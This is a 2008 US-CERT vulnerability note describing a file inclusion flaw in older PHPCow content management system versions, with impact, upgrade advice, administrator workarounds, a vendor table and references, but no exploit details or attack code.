SkipNavigation
Home | FAQ | Contact | Privacy Policy
US-CERT
American Flag
  Vulnerability
Notes
Database

Search Vulnerability Notes

Vulnerability Notes Help Information


 
 View Notes By
  Name

ID Number

CVE Name

Date Public

Date Published

Date Updated

Severity Metric
 Other Documents
  Technical Alerts

Technical Bulletins

Alerts

Security Tips

Vulnerability Note VU#515417

PHPCow file inclusion vulnerability

Overview

Older versions of PHPCow contain a file inclusion vulnerability that could allow an attacker to take control of a vulnerable application.

I. Description

PHPCow is a content management system that uses PHP. Older versions of PHP contain a file inclusion vulnerability. We are aware of reports that this issue being actively exploited.

II. Impact

A remote attacker may be able to take control of a vulnerable PHPCow application.

III. Solution

Upgrade

It is not clear which versions of PHPCow are vulnerable. The PHPCow suppport team has reported that recent versions of PHPCow addressed this issue. Contact PHPCow for more information about obtaining updated software.

Workarounds for administrators

  • Administrators are encouraged to periodically check their web server log files for indications (such as malformed URLs) that their web applications have been compromised.
  • Web application firewalls and reverse proxy servers may be able to block some known attacks.

Workarounds for users
  • Following the recommendations in the Securing Your Web Browser document will mitigate many attacks that an attacker may launch after taking over a web application.

Systems Affected
VendorStatusDate NotifiedDate Updated
PHPCow, LLCVulnerable2008-11-19

References


https://support.phpcow.com/index.php?_m=knowledgebase&_a=printable&kbarticleid=14
http://www.us-cert.gov/reading_room/securing_browser/
http://www.owasp.org/index.php/PHP_Top_5
http://www.g-brain.net/tutorials/local-file-inclusions.txt

Credit

This document was written by Ryan Giobbi.

Other Information

Date Public:2008-11-19
Date First Published:2008-11-19
Date Last Updated:2008-11-19
CERT Advisory: 
CVE-ID(s): 
NVD-ID(s): 
US-CERT Technical Alerts: 
Metric:1.35
Document Revision:26

If you have feedback, comments, or additional information about this vulnerability, please send us email.
 

 
Page Corner Image
Produced 2008 by US-CERT, a government organization
Disclaimers and copyright information
Get Adobe Reader Get Adobe Reader